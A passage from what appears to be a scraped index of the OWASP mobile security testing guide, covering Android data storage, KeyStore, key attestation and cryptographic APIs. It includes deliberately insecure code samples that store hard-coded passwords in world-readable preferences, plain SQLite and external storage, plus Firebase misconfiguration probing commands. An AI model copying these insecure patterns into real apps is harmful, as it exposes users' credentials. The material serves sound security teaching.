Furthermore, developers can use the power of Magisk to create custom modules and submit them to the official Magisk Modules repository. Submitted modules can then be installed inside the Magisk Manager application. One of these installable modules is a systemless version of the famous Xposed Framework (available for SDK versions up to 27).
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#root-detection","title":"Root Detection","text":"An extensive list of root detection methods is presented in the \"Testing Anti-Reversing Defenses on Android\" chapter.
For a typical mobile app security build, you'll usually want to test a debug build with root detection disabled. If such a build is not available for testing, you can disable root detection in a variety of ways that will be introduced later in this book.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/","title":"Android Data Storage","text":""},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#overview","title":"Overview","text":"This chapter discusses the importance of securing sensitive data, like authentication tokens and private information, vital for mobile security. We'll look at Android's APIs for local data storage and share best practices.
While it's preferable to limit sensitive data on local storage, or avoid it altogether whenever possible, practical use cases often necessitate user data storage. For example, to improve user experience, apps cache authentication tokens locally, circumventing the need for complex password entry at each app start. Apps may also need to store personally identifiable information (PII) and other sensitive data.
Sensitive data can become vulnerable if improperly protected, potentially stored in various locations, including the device or an external SD card. It's important to identify the information processed by the mobile app and classify what counts as sensitive data. Check out the \"Identifying Sensitive Data\" section in the \"Mobile App Security Testing\" chapter for data classification details. Refer to Security Tips for Storing Data in the Android developer's guide for comprehensive insights.
Sensitive information disclosure risks include potential information decryption, social engineering attacks (if PII is disclosed), account hijacking (if session information or an authentication token is disclosed), and app exploitation with a payment option.
In addition to data protection, validate and sanitize data from any storage source. This includes checking correct data types and implementing cryptographic controls, such as HMACs, for data integrity.
Android offers various data storage methods, tailored to users, developers, and applications. Common persistent storage techniques include:
Additionally, other Android functions that can result in data storage and should be tested include:
Understanding each relevant data storage function is crucial for performing the appropriate test cases. This overview provides a brief outline of these data storage methods and points testers to further relevant documentation.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#shared-preferences","title":"Shared Preferences","text":"The SharedPreferences API is commonly used to permanently save small collections of key-value pairs. Data stored in a SharedPreferences object is written to a plain-text XML file. The SharedPreferences object can be declared world-readable (accessible to all apps) or private. Misuse of the SharedPreferences API can often lead to exposure of sensitive data. Consider the following example:
Example for Java:
SharedPreferences sharedPref = getSharedPreferences(\"key\", MODE_WORLD_READABLE);\nSharedPreferences.Editor editor = sharedPref.edit();\neditor.putString(\"username\", \"administrator\");\neditor.putString(\"password\", \"supersecret\");\neditor.commit();\n
Example for Kotlin:
var sharedPref = getSharedPreferences(\"key\", Context.MODE_WORLD_READABLE)\nvar editor = sharedPref.edit()\neditor.putString(\"username\", \"administrator\")\neditor.putString(\"password\", \"supersecret\")\neditor.commit()\n
Once the activity has been called, the file key.xml will be created with the provided data. This code violates several best practices.
/data/data/<package-name>/shared_prefs/key.xml
.<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n <string name=\"username\">administrator</string>\n <string name=\"password\">supersecret</string>\n</map>\n
MODE_WORLD_READABLE
allows all applications to access and read the contents of key.xml
.root@hermes:/data/data/sg.vp.owasp_mobile.myfirstapp/shared_prefs # ls -la\n-rw-rw-r-- u0_a118 170 2016-04-23 16:51 key.xml\n
Please note that MODE_WORLD_READABLE
and MODE_WORLD_WRITEABLE
were deprecated starting on API level 17. Although newer devices may not be affected by this, applications compiled with an android:targetSdkVersion
value less than 17 may be affected if they run on an OS version that was released before Android 4.2 (API level 17).
The Android platform provides a number of database options as aforementioned in the previous list. Each database option has its own quirks and methods that need to be understood.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-database-unencrypted","title":"SQLite Database (Unencrypted)","text":"SQLite is an SQL database engine that stores data in .db
files. The Android SDK has built-in support for SQLite databases. The main package used to manage the databases is android.database.sqlite
. For example, you may use the following code to store sensitive information within an activity:
Example in Java:
SQLiteDatabase notSoSecure = openOrCreateDatabase(\"privateNotSoSecure\", MODE_PRIVATE, null);\nnotSoSecure.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR, Password VARCHAR);\");\nnotSoSecure.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPass');\");\nnotSoSecure.close();\n
Example in Kotlin:
var notSoSecure = openOrCreateDatabase(\"privateNotSoSecure\", Context.MODE_PRIVATE, null)\nnotSoSecure.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR, Password VARCHAR);\")\nnotSoSecure.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPass');\")\nnotSoSecure.close()\n
Once the activity has been called, the database file privateNotSoSecure
will be created with the provided data and stored in the clear text file /data/data/<package-name>/databases/privateNotSoSecure
.
The database's directory may contain several files besides the SQLite database:
Sensitive information should not be stored in unencrypted SQLite databases.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-databases-encrypted","title":"SQLite Databases (Encrypted)","text":"With the library SQLCipher, you can password-encrypt SQLite databases.
Example in Java:
SQLiteDatabase secureDB = SQLiteDatabase.openOrCreateDatabase(database, \"password123\", null);\nsecureDB.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR,Password VARCHAR);\");\nsecureDB.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPassEnc');\");\nsecureDB.close();\n
Example in Kotlin:
var secureDB = SQLiteDatabase.openOrCreateDatabase(database, \"password123\", null)\nsecureDB.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR,Password VARCHAR);\")\nsecureDB.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPassEnc');\")\nsecureDB.close()\n
Secure ways to retrieve the database key include:
Firebase is a development platform with more than 15 products, and one of them is Firebase Real-time Database. It can be leveraged by application developers to store and sync data with a NoSQL cloud-hosted database. The data is stored as JSON and is synchronized in real-time to every connected client and also remains available even when the application goes offline.
A misconfigured Firebase instance can be identified by making the following network call:
https://_firebaseProjectName_.firebaseio.com/.json
The firebaseProjectName can be retrieved from the mobile application by reverse engineering the application. Alternatively, the analysts can use Firebase Scanner, a python script that automates the task above as shown below:
python FirebaseScanner.py -p <pathOfAPKFile>\n\npython FirebaseScanner.py -f <commaSeparatedFirebaseProjectNames>\n
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#realm-databases","title":"Realm Databases","text":"The Realm Database for Java is becoming more and more popular among developers. The database and its contents can be encrypted with a key stored in the configuration file.
//the getKey() method either gets the key from the server or from a KeyStore, or is derived from a password.\nRealmConfiguration config = new RealmConfiguration.Builder()\n .encryptionKey(getKey())\n .build();\n\nRealm realm = Realm.getInstance(config);\n
If the database is not encrypted, you should be able to obtain the data. If the database is encrypted, determine whether the key is hard-coded in the source or resources and whether it is stored unprotected in shared preferences or some other location.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#internal-storage","title":"Internal Storage","text":"You can save files to the device's internal storage. Files saved to internal storage are containerized by default and cannot be accessed by other apps on the device. When the user uninstalls your app, these files are removed. The following code snippets would persistently store sensitive data to internal storage.
Example for Java:
FileOutputStream fos = null;\ntry {\n fos = openFileOutput(FILENAME, Context.MODE_PRIVATE);\n fos.write(test.getBytes());\n fos.close();\n} catch (FileNotFoundException e) {\n e.printStackTrace();\n} catch (IOException e) {\n e.printStackTrace();\n}\n
Example for Kotlin:
var fos: FileOutputStream? = null\nfos = openFileOutput(\"FILENAME\", Context.MODE_PRIVATE)\nfos.write(test.toByteArray(Charsets.UTF_8))\nfos.close()\n
You should check the file mode to make sure that only the app can access the file. You can set this access with MODE_PRIVATE
. Modes such as MODE_WORLD_READABLE
(deprecated) and MODE_WORLD_WRITEABLE
(deprecated) may pose a security risk.
Search for the class FileInputStream
to find out which files are opened and read within the app.
Every Android-compatible device supports shared external storage. This storage may be removable (such as an SD card) or internal (non-removable). Files saved to external storage are world-readable. The user can modify them when USB mass storage is enabled. You can use the following code snippets to persistently store sensitive information to external storage as the contents of the file password.txt
.
Example for Java:
File file = new File (Environment.getExternalFilesDir(), \"password.txt\");\nString password = \"SecretPassword\";\nFileOutputStream fos;\n fos = new FileOutputStream(file);\n fos.write(password.getBytes());\n fos.close();\n
Example for Kotlin:
val password = \"SecretPassword\"\nval path = context.getExternalFilesDir(null)\nval file = File(path, \"password.txt\")\nfile.appendText(password)\n
The file will be created and the data will be stored in a clear text file in external storage once the activity has been called.
It's also worth knowing that files stored outside the application folder (data/data/<package-name>/
) will not be deleted when the user uninstalls the application. Finally, it's worth noting that the external storage can be used by an attacker to allow for arbitrary control of the application in some cases. For more information: see the blog post from Checkpoint.
The Android KeyStore supports relatively secure credential storage. As of Android 4.3 (API level 18), it provides public APIs for storing and using app-private keys. An app can use a public key to create a new private/public key pair for encrypting application secrets, and it can decrypt the secrets with the private key.
You can protect keys stored in the Android KeyStore with user authentication in a confirm credential flow. The user's lock screen credentials (pattern, PIN, password, or fingerprint) are used for authentication.
You can use stored keys in one of two modes:
Users are authorized to use keys for a limited period of time after authentication. In this mode, all keys can be used as soon as the user unlocks the device. You can customize the period of authorization for each key. You can use this option only if the secure lock screen is enabled. If the user disables the secure lock screen, all stored keys will become permanently invalid.
Users are authorized to use a specific cryptographic operation that is associated with one key. In this mode, users must request a separate authorization for each operation that involves the key. Currently, fingerprint authentication is the only way to request such authorization.
The level of security afforded by the Android KeyStore depends on its implementation, which depends on the device. Most modern devices offer a hardware-backed KeyStore implementation: keys are generated and used in a Trusted Execution Environment (TEE) or a Secure Element (SE), and the operating system can't access them directly. This means that the encryption keys themselves can't be easily retrieved, even from a rooted device. You can verify hardware-backed keys with Key Attestation. You can determine whether the keys are inside the secure hardware by checking the return value of the isInsideSecureHardware
method, which is part of the KeyInfo
class.
Note that the relevant KeyInfo indicates that secret keys and HMAC keys are insecurely stored on several devices despite private keys being correctly stored on the secure hardware.
The keys of a software-only implementation are encrypted with a per-user encryption master key. An attacker can access all keys stored on rooted devices that have this implementation in the folder /data/misc/keystore/
. Because the user's lock screen pin/password is used to generate the master key, the Android KeyStore is unavailable when the device is locked. For more security Android 9 (API level 28) introduces the unlockedDeviceRequired
flag. By passing true
to the setUnlockedDeviceRequired
method, the app prevents its keys stored in AndroidKeystore
from being decrypted when the device is locked, and it requires the screen to be unlocked before allowing decryption.
The hardware-backed Android KeyStore adds another layer to the defense-in-depth security concept for Android. Keymaster Hardware Abstraction Layer (HAL) was introduced with Android 6 (API level 23). Applications can verify if the key is stored inside the security hardware (by checking if KeyInfo.isInsideSecureHardware
returns true
). Devices running Android 9 (API level 28) and higher can have a StrongBox Keymaster
module, an implementation of the Keymaster HAL that resides in a hardware security module which has its own CPU, secure storage, a true random number generator and a mechanism to resist package tampering. To use this feature, true
must be passed to the setIsStrongBoxBacked
method in either the KeyGenParameterSpec.Builder
class or the KeyProtection.Builder
class when generating or importing keys using AndroidKeystore
. To make sure that StrongBox is used during runtime, check that isInsideSecureHardware
returns true
and that the system does not throw StrongBoxUnavailableException
, which gets thrown if the StrongBox Keymaster isn't available for the given algorithm and key size associated with a key. Description of features on hardware-based keystore can be found on AOSP pages.
Keymaster HAL is an interface to hardware-backed components - Trusted Execution Environment (TEE) or a Secure Element (SE), which is used by Android Keystore. An example of such a hardware-backed component is Titan M.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#key-attestation","title":"Key Attestation","text":"For the applications which heavily rely on Android Keystore for business-critical operations, such as multi-factor authentication through cryptographic primitives, secure storage of sensitive data at the client-side, etc. Android provides the feature of Key Attestation, which helps to analyze the security of cryptographic material managed through Android Keystore. From Android 8.0 (API level 26), the key attestation was made mandatory for all new (Android 7.0 or higher) devices that need to have device certification for Google apps. Such devices use attestation keys signed by the Google hardware Attestation Root certificate and the same can be verified through the key attestation process.
During key attestation, we can specify the alias of a key pair and in return, get a certificate chain, which we can use to verify the properties of that key pair. If the root certificate of the chain is the Google Hardware Attestation Root certificate, and the checks related to key pair storage in hardware are made, it gives an assurance that the device supports hardware-level key attestation, and that the key is in the hardware-backed keystore that Google believes to be secure. Alternatively, if the attestation chain has any other root certificate, then Google does not make any claims about the security of the hardware.
Although the key attestation process can be implemented within the application directly, it is recommended that it should be implemented at the server-side for security reasons. The following are the high-level guidelines for the secure implementation of Key Attestation:
setAttestationChallenge
API with the challenge received from the server and should then retrieve the attestation certificate chain using the KeyStore.getCertificateChain
method.Software
, TrustedEnvironment
or StrongBox
. The client supports hardware-level key attestation if the security level is TrustedEnvironment
or StrongBox
and the attestation certificate chain contains a root certificate signed with the Google attestation root key.Note, if for any reason that process fails, it means that the key is not in security hardware. That does not mean that the key is compromised.
The typical example of Android Keystore attestation response looks like this:
{\n \"fmt\": \"android-key\",\n \"authData\": \"9569088f1ecee3232954035dbd10d7cae391305a2751b559bb8fd7cbb229bd...\",\n \"attStmt\": {\n \"alg\": -7,\n \"sig\": \"304402202ca7a8cfb6299c4a073e7e022c57082a46c657e9e53...\",\n \"x5c\": [\n \"308202ca30820270a003020102020101300a06082a8648ce3d040302308188310b30090603550406130...\",\n \"308202783082021ea00302010202021001300a06082a8648ce3d040302308198310b300906035504061...\",\n \"3082028b30820232a003020102020900a2059ed10e435b57300a06082a8648ce3d040302308198310b3...\"\n ]\n }\n}\n
In the above JSON snippet, the keys have the following meaning:
fmt
: Attestation statement format identifierauthData
: It denotes the authenticator data for the attestationalg
: The algorithm that is used for the Signaturesig
: Signaturex5c
: Attestation certificate chainNote: The sig
is generated by concatenating authData
and clientDataHash
(challenge sent by the server) and signing through the credential private key using the alg
signing algorithm. The same is verified at the server-side by using the public key in the first certificate.
For more understanding on the implementation guidelines, you can refer to Google Sample Code.
For the security analysis perspective, the analysts may perform the following checks for the secure implementation of Key Attestation:
Android 9 (API level 28) adds the ability to import keys securely into the AndroidKeystore
. First, AndroidKeystore
generates a key pair using PURPOSE_WRAP_KEY
, which should also be protected with an attestation certificate. This pair aims to protect the Keys being imported to AndroidKeystore
. The encrypted keys are generated as ASN.1-encoded message in the SecureKeyWrapper
format, which also contains a description of the ways the imported key is allowed to be used. The keys are then decrypted inside the AndroidKeystore
hardware belonging to the specific device that generated the wrapping key, so that they never appear as plaintext in the device's host memory.
Example in Java:
KeyDescription ::= SEQUENCE {\n keyFormat INTEGER,\n authorizationList AuthorizationList\n}\n\nSecureKeyWrapper ::= SEQUENCE {\n wrapperFormatVersion INTEGER,\n encryptedTransportKey OCTET_STRING,\n initializationVector OCTET_STRING,\n keyDescription KeyDescription,\n secureKey OCTET_STRING,\n tag OCTET_STRING\n}\n
The code above presents the different parameters to be set when generating the encrypted keys in the SecureKeyWrapper format. Check the Android documentation on WrappedKeyEntry
for more details.
When defining the KeyDescription AuthorizationList, the following parameters will affect the encrypted keys security:
algorithm
parameter specifies the cryptographic algorithm with which the key is usedkeySize
parameter specifies the size, in bits, of the key, measuring in the normal way for the key's algorithmdigest
parameter specifies the digest algorithms that may be used with the key to perform signing and verification operationsOlder Android versions don't include KeyStore, but they do include the KeyStore interface from JCA (Java Cryptography Architecture). You can use KeyStores that implement this interface to ensure the secrecy and integrity of keys stored with KeyStore; BouncyCastle KeyStore (BKS) is recommended. All implementations are based on the fact that files are stored on the filesystem; all files are password-protected. To create one, use the KeyStore.getInstance(\"BKS\", \"BC\") method
, where \"BKS\" is the KeyStore name (BouncyCastle Keystore) and \"BC\" is the provider (BouncyCastle). You can also use SpongyCastle as a wrapper and initialize the KeyStore as follows: KeyStore.getInstance(\"BKS\", \"SC\")
.
Be aware that not all KeyStores properly protect the keys stored in the KeyStore files.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-a-cryptographic-key-techniques","title":"Storing a Cryptographic Key: Techniques","text":"To mitigate unauthorized use of keys on the Android device, Android KeyStore lets apps specify authorized uses of their keys when generating or importing the keys. Once made, authorizations cannot be changed.
Storing a Key - from most secure to least secure:
/sdcard/
)You can use the hardware-backed Android KeyStore if the device is running Android 7.0 (API level 24) and above with available hardware component (Trusted Execution Environment (TEE) or a Secure Element (SE)). You can even verify that the keys are hardware-backed by using the guidelines provided for the secure implementation of Key Attestation. If a hardware component is not available and/or support for Android 6.0 (API level 23) and below is required, then you might want to store your keys on a remote server and make them available after authentication.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-keys-on-the-server","title":"Storing Keys on the Server","text":"It is possible to securely store keys on a key management server, however the app needs to be online to decrypt the data. This might be a limitation for certain mobile app use cases and should be carefully thought through, as this becomes part of the architecture of the app and might highly impact usability.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#deriving-keys-from-user-input","title":"Deriving Keys from User Input","text":"Deriving a key from a user provided passphrase is a common solution (depending on which Android API level you use), but it also impacts usability, might affect the attack surface and could introduce additional weaknesses.
Each time the application needs to perform a cryptographic operation, the user's passphrase is needed. Either the user is prompted for it every time, which isn't an ideal user experience, or the passphrase is kept in memory as long as the user is authenticated. Keeping the passphrase in memory is not a best-practice, as any cryptographic material must only be kept in memory while it is being used. Zeroing out a key is often a very challenging task as explained in \"Cleaning out Key Material\".
Additionally, consider that keys derived from a passphrase have their own weaknesses. For instance, the passwords or passphrases might be reused by the user or easy to guess. Please refer to the Testing Cryptography chapter for more information.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#cleaning-out-key-material","title":"Cleaning out Key Material","text":"The key material should be cleared out from memory as soon as it is not needed anymore. There are certain limitations of reliably cleaning up secret data in languages with garbage collector (Java) and immutable strings (Swift, Objective-C, Kotlin). Java Cryptography Architecture Reference Guide suggests using char[]
instead of String
for storing sensitive data, and nullifying the array after usage.
Note that some ciphers do not properly clean up their byte-arrays. For instance, the AES Cipher in BouncyCastle does not always clean up its latest working key, leaving some copies of the byte-array in memory. Next, BigInteger based keys (e.g. private keys) cannot be removed from the heap, nor zeroed out without additional effort. Clearing byte array can be achieved by writing a wrapper which implements Destroyable.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-keys-using-android-keystore-api","title":"Storing Keys using Android KeyStore API","text":"A more user-friendly and recommended way is to use the Android KeyStore API system (itself or through KeyChain) to store key material. If it is possible, hardware-backed storage should be used. Otherwise, it should fallback to software implementation of Android Keystore. However, be aware that the AndroidKeyStore
API has been changed significantly throughout versions of Android. In earlier versions, the AndroidKeyStore
API only supported storing public/private key pairs (e.g., RSA). Symmetric key support has only been added since Android 6.0 (API level 23). As a result, a developer needs to handle the different Android API levels to securely store symmetric keys.
In order to securely store symmetric keys on devices running on Android 5.1 (API level 22) or lower, we need to generate a public/private key pair. We encrypt the symmetric key using the public key and store the private key in the AndroidKeyStore
. The encrypted symmetric key can be encoded using base64 and stored in the SharedPreferences
. Whenever we need the symmetric key, the application retrieves the private key from the AndroidKeyStore
and decrypts the symmetric key.
Envelope encryption, or key wrapping, is a similar approach that uses symmetric encryption to encapsulate key material. Data encryption keys (DEKs) can be encrypted with key encryption keys (KEKs) which are securely stored. Encrypted DEKs can be stored in SharedPreferences
or written to files. When required, the application reads the KEK, then decrypts the DEK. Refer to OWASP Cryptographic Storage Cheat Sheet to learn more about encrypting cryptographic keys.
Also, as the illustration of this approach, refer to the EncryptedSharedPreferences from androidx.security.crypto package.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#insecure-options-to-store-keys","title":"Insecure options to store keys","text":"A less secure way of storing encryption keys, is in the SharedPreferences of Android. When SharedPreferences are used, the file is only readable by the application that created it. However, on rooted devices, any other application with root access can read the SharedPreferences file of other apps. This is not the case for the AndroidKeyStore, since AndroidKeyStore access is managed on the kernel level, which needs considerably more work and skill to bypass without the AndroidKeyStore clearing or destroying the keys.
The last three options are to use hardcoded encryption keys in the source code, having a predictable obfuscation function or key derivation function based on stable attributes, and storing generated keys in public places like /sdcard/
. Hardcoded encryption keys are an issue, since this means every instance of the application uses the same encryption key. An attacker can reverse-engineer a local copy of the application to extract the cryptographic key, and use that key to decrypt any data which was encrypted by the application on any device.
Next, when you have a predictable key derivation function based on identifiers which are accessible to other applications, the attacker only needs to find the KDF and apply it to the device to find the key. Lastly, storing encryption keys publicly is also highly discouraged, as other applications can have permission to read the public partition and steal the keys.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#data-encryption-using-third-party-libraries","title":"Data Encryption Using Third Party Libraries","text":"There are several different open-source libraries that offer encryption capabilities specific to the Android platform.
Please keep in mind that as long as the key is not stored in the KeyStore, it is always possible to easily retrieve the key on a rooted device and then decrypt the values you are trying to protect.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#keychain","title":"KeyChain","text":"The KeyChain class is used to store and retrieve system-wide private keys and their corresponding certificates (chain). The user will be prompted to set a lock screen pin or password to protect the credential storage if something is being imported into the KeyChain for the first time. Note that the KeyChain is system-wide, every application can access the materials stored in the KeyChain.
Inspect the source code to determine whether native Android mechanisms identify sensitive information. Sensitive information should be encrypted, not stored in clear text. For sensitive information that must be stored on the device, several API calls are available to protect the data via the KeyChain
class. Complete the following steps:
AndroidKeystore
, import java.security.KeyStore
, import javax.crypto.Cipher
, import java.security.SecureRandom
, and corresponding usages.store(OutputStream stream, char[] password)
function to store the KeyStore to disk with a password. Make sure that the password is provided by the user, not hard-coded.There are many legitimate reasons to create log files on a mobile device, such as keeping track of crashes, errors, and usage statistics. Log files can be stored locally when the app is offline and sent to the endpoint once the app is online. However, logging sensitive data may expose the data to attackers or malicious applications, and it might also violate user confidentiality. You can create log files in several ways. The following list includes two classes that are available for Android:
Android provides users with an auto-backup feature. The backups usually include copies of data and settings for all installed apps. Given its diverse ecosystem, Android supports many backup options:
Stock Android has built-in USB backup facilities. When USB debugging is enabled, use the adb backup
command to create full data backups and backups of an app's data directory.
Google provides a \"Back Up My Data\" feature that backs up all app data to Google's servers.
Two Backup APIs are available to app developers:
Key/Value Backup (Backup API or Android Backup Service) uploads to the Android Backup Service cloud.
Auto Backup for Apps: With Android 6.0 (API level 23) and above, Google added the \"Auto Backup for Apps feature\". This feature automatically syncs at most 25MB of app data with the user's Google Drive account.
OEMs may provide additional options. For example, HTC devices have a \"HTC Backup\" option that performs daily backups to the cloud when activated.
Apps must carefully ensure that sensitive user data doesn't end up in these backups as this may allow an attacker to extract it.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#adb-backup-support","title":"ADB Backup Support","text":"Android provides an attribute called allowBackup
to back up all your application data. This attribute is set in the AndroidManifest.xml
file. If the value of this attribute is true, the device allows users to back up the application with Android Debug Bridge (ADB) via the command $ adb backup
.
To prevent the app data backup, set the android:allowBackup
attribute to false. When this attribute is unavailable, the allowBackup setting is enabled by default, and backup must be manually deactivated.
Note: If the device was encrypted, then the backup files will be encrypted as well.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#process-memory","title":"Process Memory","text":"All applications on Android use memory to perform normal computational operations like any regular modern-day computer. It is of no surprise then that at times sensitive operations will be performed within process memory. For this reason, it is important that once the relevant sensitive data has been processed, it should be disposed from process memory as quickly as possible.
The investigation of an application's memory can be done from memory dumps, and from analyzing the memory in real time via a debugger.
For an overview of possible sources of data exposure, check the documentation and identify application components before you examine the source code. For example, sensitive data from a backend may be in the HTTP client, the XML parser, etc. You want all these copies to be removed from memory as soon as possible.
In addition, understanding the application's architecture and the architecture's role in the system will help you identify sensitive information that doesn't have to be exposed in memory at all. For example, assume your app receives data from one server and transfers it to another without any processing. That data can be handled in an encrypted format, which prevents exposure in memory.
However, if you need to expose sensitive data in memory, you should make sure that your app is designed to expose as few data copies as possible as briefly as possible. In other words, you want the handling of sensitive data to be centralized (i.e., with as few components as possible) and based on primitive, mutable data structures.
The latter requirement gives developers direct memory access. Make sure that they use this access to overwrite the sensitive data with dummy data (typically zeroes). Examples of preferable data types include byte []
and char []
, but not String
or BigInteger
. Whenever you try to modify an immutable object like String
, you create and change a copy of the object.
Using non-primitive mutable types like StringBuffer
and StringBuilder
may be acceptable, but it's indicative and requires care. Types like StringBuffer
are used to modify content (which is what you want to do). To access such a type's value, however, you would use the toString
method, which would create an immutable copy of the data. There are several ways to use these data types without creating an immutable copy, but they require more effort than using a primitive array. Safe memory management is one benefit of using types like StringBuffer
, but this can be a two-edged sword. If you try to modify the content of one of these types and the copy exceeds the buffer capacity, the buffer size will automatically increase. The buffer content may be copied to a different location, leaving the old content without a reference you can use to overwrite it.
Unfortunately, few libraries and frameworks are designed to allow sensitive data to be overwritten. For example, destroying a key, as shown below, doesn't remove the key from memory:
Example in Java:
SecretKey secretKey = new SecretKeySpec(\"key\".getBytes(), \"AES\");\nsecretKey.destroy();\n
Example in Kotlin:
val secretKey: SecretKey = SecretKeySpec(\"key\".toByteArray(), \"AES\")\nsecretKey.destroy()\n
Overwriting the backing byte-array from secretKey.getEncoded
doesn't remove the key either; the SecretKeySpec-based key returns a copy of the backing byte-array. See the sections below for the proper way to remove a SecretKey
from memory.
The RSA key pair is based on the BigInteger
type and therefore resides in memory after its first use outside the AndroidKeyStore
. Some ciphers (such as the AES Cipher
in BouncyCastle
) do not properly clean up their byte-arrays.
User-provided data (credentials, social security numbers, credit card information, etc.) is another type of data that may be exposed in memory. Regardless of whether you flag it as a password field, EditText
delivers content to the app via the Editable
interface. If your app doesn't provide Editable.Factory
, user-provided data will probably be exposed in memory for longer than necessary. The default Editable
implementation, the SpannableStringBuilder
, causes the same issues as Java's StringBuilder
and StringBuffer
cause (discussed above).
The features provided by third-party services can involve tracking services to monitor the user's behavior while using the app, selling banner advertisements, or improving the user experience.
The downside is that developers don't usually know the details of the code executed via third-party libraries. Consequently, no more information than is necessary should be sent to a service, and no sensitive information should be disclosed.
Most third-party services are implemented in two ways:
At certain points in time, the user will have to enter sensitive information into the application. This data may be financial information such as credit card data or user account passwords, or maybe healthcare data. The data may be exposed if the app doesn't properly mask it while it is being typed.
In order to prevent disclosure and mitigate risks such as shoulder surfing you should verify that no sensitive data is exposed via the user interface unless explicitly required (e.g. a password being entered). For the data required to be present it should be properly masked, typically by showing asterisks or dots instead of clear text.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#screenshots","title":"Screenshots","text":"Manufacturers want to provide device users with an aesthetically pleasing experience at application startup and exit, so they introduced the screenshot-saving feature for use when the application is backgrounded. This feature may pose a security risk. Sensitive data may be exposed if the user deliberately screenshots the application while sensitive data is displayed. A malicious application that is running on the device and able to continuously capture the screen may also expose data. Screenshots are written to local storage, from which they may be recovered by a rogue application (if the device is rooted) or someone who has stolen the device.
For example, capturing a screenshot of a banking application may reveal information about the user's account, credit, transactions, and so on.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#app-notifications","title":"App Notifications","text":"It is important to understand that notifications should never be considered private. When a notification is handled by the Android system it is broadcasted system-wide and any application running with a NotificationListenerService can listen for these notifications to receive them in full and may handle them however it wants.
There are many known malware samples, such as Joker and Alien, which abuse the NotificationListenerService
to listen for notifications on the device and then send them to attacker-controlled C2 infrastructure. Commonly this is done to listen for two-factor authentication (2FA) codes that appear as notifications on the device which are then sent to the attacker. A safer alternative for the user would be to use a 2FA application that does not generate notifications.
Furthermore, there are a number of apps on the Google Play Store that provide notification logging, which logs locally any notifications on the Android system. This highlights that notifications are in no way private on Android and are accessible by any other app on the device.
For this reason all notification usage should be inspected for confidential or high risk information that could be used by malicious applications.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#keyboard-cache","title":"Keyboard Cache","text":"When users enter information in input fields, the software automatically suggests data. This feature can be very useful for messaging apps. However, the keyboard cache may disclose sensitive information when the user selects an input field that takes this type of information.
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/","title":"Android Cryptographic APIs","text":""},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#overview","title":"Overview","text":"In the chapter \"Mobile App Cryptography\", we introduced general cryptography best practices and described typical issues that can occur when cryptography is used incorrectly. In this chapter, we'll go into more detail on Android's cryptography APIs. We'll show how to identify usage of those APIs in the source code and how to interpret cryptographic configurations. When reviewing code, make sure to compare the cryptographic parameters used with the current best practices, as linked in this guide.
We can identify the key components of the cryptography system on Android:
Android cryptography APIs are based on the Java Cryptography Architecture (JCA). JCA separates the interfaces and implementation, making it possible to include several security providers that can implement sets of cryptographic algorithms. Most of the JCA interfaces and classes are defined in the java.security.*
and javax.crypto.*
packages. In addition, there are Android specific packages android.security.*
and android.security.keystore.*
.
KeyStore and KeyChain provide APIs for storing and using keys (behind the scenes, the KeyChain API uses the KeyStore system). These systems allow you to administer the full lifecycle of the cryptographic keys. Requirements and guidance for the implementation of cryptographic key management can be found in the Key Management Cheat Sheet. We can identify the following phases:
Please note that storing of a key is analyzed in the chapter \"Testing Data Storage\".
These phases are managed by the Keystore/KeyChain system. However how the system works depends on how the application developer implemented it. For the analysis process you should focus on functions which are used by the application developer. You should identify and verify the following functions:
Apps that target modern API levels went through the following changes:
Crypto
provider has been dropped and is deprecated. The same applies to its SHA1PRNG
for secure random.AndroidOpenSSL
, is preferred over Bouncy Castle and has new implementations: AlgorithmParameters:GCM
, KeyGenerator:AES
, KeyGenerator:DESEDE
, KeyGenerator:HMACMD5
, KeyGenerator:HMACSHA1
, KeyGenerator:HMACSHA224
, KeyGenerator:HMACSHA256
, KeyGenerator:HMACSHA384
, KeyGenerator:HMACSHA512
, SecretKeyFactory:DESEDE
, and Signature:NONEWITHECDSA
.IvParameterSpec.class
anymore for GCM, but use the GCMParameterSpec.class
instead.OpenSSLSocketImpl
to ConscryptFileDescriptorSocket
, and ConscryptEngineSocket
.SSLSession
with null parameters give a NullPointerException
.InvalidKeySpecException
is thrown.SocketException
.getInstance
method and you target any API below 28. If you target Android 9 (API level 28) or above, you get an error.Crypto
security provider is now removed. Calling it will result in a NoSuchProviderException
.The following list of recommendations should be considered during app examination:
SHA1PRNG
as they are deprecated.Android relies on the java.security.Provider
class to implement Java Security services. These providers are crucial to ensure secure network communications and secure other functionalities which depend on cryptography.
